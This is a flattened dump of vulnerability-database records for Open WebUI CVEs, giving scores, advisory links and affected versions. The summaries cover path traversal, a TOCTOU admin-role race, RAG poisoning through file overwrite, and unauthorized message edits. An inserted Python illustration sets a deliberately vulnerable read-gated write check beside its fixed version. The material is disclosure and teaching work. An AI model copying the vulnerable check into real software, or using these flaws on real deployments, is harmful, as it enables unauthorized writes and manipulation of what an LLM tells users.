reference_url https://github.com/advisories/GHSA-rcvp-6fgw-c7fh
reference_id GHSA-rcvp-6fgw-c7fh
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rcvp-6fgw-c7fh
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-rcvp-6fgw-c7fh
reference_id GHSA-rcvp-6fgw-c7fh
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T14:32:02Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-rcvp-6fgw-c7fh
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44563, GHSA-rcvp-6fgw-c7fh
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s625-eg1w-gfd1
54
url VCID-t571-d65a-cyb2
vulnerability_id VCID-t571-d65a-cyb2
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the LDAP and OAuth authentication flows use a TOCTOU (Time-of-Check-Time-of-Use) pattern for first-user admin role assignment. The regular signup handler (signup_handler in auths.py, line 663) was explicitly patched to prevent this race with the comment "Insert with default role first to avoid TOCTOU race", but the LDAP and OAuth code paths were never updated with the same fix. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45675
reference_id
reference_type
scores
0
value 0.00114
scoring_system epss
scoring_elements 0.29641
published_at 2026-06-11T12:55:00Z
1
value 0.00114
scoring_system epss
scoring_elements 0.29841
published_at 2026-06-14T12:55:00Z
2
value 0.00114
scoring_system epss
scoring_elements 0.29838
published_at 2026-06-12T12:55:00Z
3
value 0.00114
scoring_system epss
scoring_elements 0.29856
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45675
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45675
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45675
4
reference_url https://github.com/open-webui/open-webui/pull/23626
reference_id 23626
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:45Z/
url https://github.com/open-webui/open-webui/pull/23626
5
reference_url https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec
reference_id 96a0b3239b1aadb23fc359bf10849c9ba12fd6ec
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:45Z/
url https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec
6
reference_url https://github.com/advisories/GHSA-h3ww-q6xx-w7x3
reference_id GHSA-h3ww-q6xx-w7x3
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h3ww-q6xx-w7x3
7
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3
reference_id GHSA-h3ww-q6xx-w7x3
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:45Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-45675, GHSA-h3ww-q6xx-w7x3
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-t571-d65a-cyb2
55
url VCID-tz2k-gazs-mqgd
vulnerability_id VCID-tz2k-gazs-mqgd
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.10, when uploading an audio file, the name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem where the user running the web server has write permission. This vulnerability is fixed in 0.6.10.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44565
reference_id
reference_type
scores
0
value 0.00021
scoring_system epss
scoring_elements 0.05947
published_at 2026-06-14T12:55:00Z
1
value 0.00021
scoring_system epss
scoring_elements 0.05942
published_at 2026-06-11T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05955
published_at 2026-06-13T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.05964
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44565
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44565
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44565
3
reference_url https://github.com/advisories/GHSA-j3fw-wc48-29g3
reference_id GHSA-j3fw-wc48-29g3
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j3fw-wc48-29g3
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-j3fw-wc48-29g3
reference_id GHSA-j3fw-wc48-29g3
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:52:24Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-j3fw-wc48-29g3
fixed_packages
0
url pkg:pypi/open-webui@0.6.10
purl pkg:pypi/open-webui@0.6.10
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-hj5f-yk3y-ffdg
29
vulnerability VCID-jfs9-dps1-27a2
30
vulnerability VCID-jnsg-u9dy-r3d5
31
vulnerability VCID-k17g-bd9g-67f7
32
vulnerability VCID-k9jf-5jzd-pkge
33
vulnerability VCID-mn21-kwuu-w7by
34
vulnerability VCID-n4ma-zcpv-5fbp
35
vulnerability VCID-nxvm-97r4-6ybz
36
vulnerability VCID-pkds-1xgn-q3bv
37
vulnerability VCID-pvep-chj7-ekeg
38
vulnerability VCID-pwsg-72yy-quhk
39
vulnerability VCID-q682-k826-efhv
40
vulnerability VCID-qgfh-7u8n-y7c7
41
vulnerability VCID-qjt1-zxx8-r7ht
42
vulnerability VCID-r7vt-4bqm-f7hb
43
vulnerability VCID-reqw-pfm8-c7g5
44
vulnerability VCID-rhhj-rccv-87hw
45
vulnerability VCID-s625-eg1w-gfd1
46
vulnerability VCID-t571-d65a-cyb2
47
vulnerability VCID-u25g-p4nx-gqd1
48
vulnerability VCID-ujye-g4rj-8be5
49
vulnerability VCID-um53-kf7u-kkg6
50
vulnerability VCID-vghe-uuzj-m7cu
51
vulnerability VCID-vkx3-71kv-sugt
52
vulnerability VCID-w2vd-r3hr-w3bt
53
vulnerability VCID-wb88-83cj-ffhy
54
vulnerability VCID-wcz4-vwx4-tufb
55
vulnerability VCID-yug9-shts-kufb
56
vulnerability VCID-yysb-dk2k-f7g4
57
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.10
aliases CVE-2026-44565, GHSA-j3fw-wc48-29g3
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tz2k-gazs-mqgd
56
url VCID-u25g-p4nx-gqd1
vulnerability_id VCID-u25g-p4nx-gqd1
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can overwrite any file's content by ID through the `POST /api/v1/retrieval/process/files/batch` endpoint. The endpoint performs no ownership check, so a regular user with read access to a shared knowledge base can obtain file UUIDs via `GET /api/v1/knowledge/{id}/files` and then overwrite those files, escalating from read to write. The overwritten content is served to the LLM via RAG, meaning the attacker controls what the model tells other users. Version 0.8.6 patches the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28788
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.05269
published_at 2026-06-14T12:55:00Z
1
value 0.00019
scoring_system epss
scoring_elements 0.0527
published_at 2026-06-11T12:55:00Z
2
value 0.00019
scoring_system epss
scoring_elements 0.05279
published_at 2026-06-13T12:55:00Z
3
value 0.00019
scoring_system epss
scoring_elements 0.05286
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28788
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.6
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.6
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28788
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28788
4
reference_url https://github.com/advisories/GHSA-jjp7-g2jw-wh3j
reference_id GHSA-jjp7-g2jw-wh3j
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jjp7-g2jw-wh3j
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jjp7-g2jw-wh3j
reference_id GHSA-jjp7-g2jw-wh3j
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-27T20:08:10Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jjp7-g2jw-wh3j
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-28788, GHSA-jjp7-g2jw-wh3j
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u25g-p4nx-gqd1
57
url VCID-ujye-g4rj-8be5
vulnerability_id VCID-ujye-g4rj-8be5
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.6, in standard channels (i.e., channels whose channel.type is neither group nor dm), the endpoint POST /api/v1/channels/{channel_id}/messages/{message_id}/update can be accessed with read permission only. When access_control is set to None, the authorization check has_access(..., type="read") evaluates to True, allowing users who are not the message owner to update messages. As a result, unauthorized modification of other users’ messages is possible. This vulnerability is fixed in 0.8.6.
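The two findings VCID-u25g-p4nx-gqd1 (CVE-2026-28788, batch file overwrite) and VCID-ujye-g4rj-8be5 (CVE-2026-44571, channel message update) share a root cause: a write operation is gated on a check that is weaker than ownership, or on no check at all. The block below is an added example and not Open WebUI's own code; the User/File/Channel/Message shapes, the access_control dict layout and every function name are assumptions chosen to mirror the two summaries. It places the read-gated decision that the summary describes next to an owner-or-admin decision, and shows a fail-closed batch write in which a single foreign file id rejects the whole request before anything is written.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class User:
    id: str
    role: str = "user"              # "admin" or "user"


@dataclass
class Channel:
    id: str
    type: str = "channel"           # "channel", "group" or "dm"
    # None means "every authenticated user may read", as the summary describes
    access_control: Optional[dict] = None


@dataclass
class Message:
    id: str
    channel_id: str
    user_id: str                    # author
    content: str


@dataclass
class File:
    id: str
    user_id: str                    # uploader / owner
    content: str


def has_access(user: User, access_control: Optional[dict], type: str = "read") -> bool:
    """Resource-level check. Assumed layout: {"read": {"user_ids": [...]},
    "write": {"user_ids": [...]}}; None grants read to everyone, write to nobody."""
    if access_control is None:
        return type == "read"
    return user.id in access_control.get(type, {}).get("user_ids", [])


def vulnerable_can_update_message(user: User, channel: Channel, message: Message) -> bool:
    """The pre-0.8.6 pattern from the summary: a read check guards a write.
    With access_control None this is True for any authenticated user, author or not."""
    return has_access(user, channel.access_control, "read")


def can_update_message(user: User, channel: Channel, message: Message) -> bool:
    """Fixed pattern: editing is an owner (or admin) operation. Channel read
    access is still required, but it is not sufficient."""
    if message.channel_id != channel.id:
        return False
    if not has_access(user, channel.access_control, "read"):
        return False
    return user.role == "admin" or message.user_id == user.id


def overwrite_files_batch(user: User, files_by_id: dict, updates: dict) -> dict:
    """Fixed batch endpoint: authorise every target first, write second.
    One foreign id rejects the whole batch, so no partial overwrite lands."""
    targets = []
    for file_id, new_content in updates.items():
        f = files_by_id.get(file_id)
        if f is None:
            raise KeyError(file_id)
        if user.role != "admin" and f.user_id != user.id:
            raise PermissionError(f"user {user.id} does not own file {file_id}")
        targets.append((f, new_content))
    for f, new_content in targets:
        f.content = new_content
    return {f.id: f.content for f, _ in targets}


def demo() -> dict:
    """Constructed sample data: alice authored a message and owns f1; bob is a
    regular user who can read the shared channel and knowledge base."""
    alice, bob = User("alice"), User("bob")
    channel = Channel("general")                      # access_control None
    msg = Message("m1", "general", "alice", "hello")
    files = {"f1": File("f1", "alice", "policy v1"), "f2": File("f2", "bob", "notes")}

    try:
        overwrite_files_batch(bob, files, {"f2": "my notes", "f1": "POISONED"})
        batch_rejected = False
    except PermissionError:
        batch_rejected = True

    return {
        "vulnerable_lets_bob_edit": vulnerable_can_update_message(bob, channel, msg),
        "fixed_lets_bob_edit": can_update_message(bob, channel, msg),
        "fixed_lets_alice_edit": can_update_message(alice, channel, msg),
        "batch_rejected": batch_rejected,
        "f1_untouched": files["f1"].content == "policy v1",
        "f2_untouched": files["f2"].content == "notes",
        "owner_batch": overwrite_files_batch(alice, files, {"f1": "policy v2"}),
    }


if __name__ == "__main__":
    print(demo())
```

The batch function deliberately separates the authorisation pass from the write pass: with a per-item check-then-write loop, bob's request above would have overwritten f2 before failing on f1, and a caller could order ids to get partial writes through.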
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44571
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.0146
published_at 2026-06-12T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01475
published_at 2026-06-14T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01458
published_at 2026-06-11T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.01466
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44571
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44571
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44571
3
reference_url https://github.com/advisories/GHSA-jgj3-r8hr-9pjw
reference_id GHSA-jgj3-r8hr-9pjw
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jgj3-r8hr-9pjw
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jgj3-r8hr-9pjw
reference_id GHSA-jgj3-r8hr-9pjw
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:18:47Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jgj3-r8hr-9pjw
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-44571, GHSA-jgj3-r8hr-9pjw
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ujye-g4rj-8be5
58
url VCID-um53-kf7u-kkg6
vulnerability_id VCID-um53-kf7u-kkg6
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.11, there is a broken access control vulnerability in tool values. This issue has been patched in version 0.8.11.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-34222
reference_id
reference_type
scores
0
value 0.00016
scoring_system epss
scoring_elements 0.04101
published_at 2026-06-13T12:55:00Z
1
value 0.00016
scoring_system epss
scoring_elements 0.04111
published_at 2026-06-14T12:55:00Z
2
value 0.00016
scoring_system epss
scoring_elements 0.04093
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-34222
1
reference_url http://seclists.org/fulldisclosure/2026/Apr/4
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://seclists.org/fulldisclosure/2026/Apr/4
2
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-34222
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-34222
4
reference_url https://github.com/advisories/GHSA-7429-hxcv-268m
reference_id GHSA-7429-hxcv-268m
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7429-hxcv-268m
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-7429-hxcv-268m
reference_id GHSA-7429-hxcv-268m
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-04T03:03:22Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-7429-hxcv-268m
6
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.11
reference_id v0.8.11
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
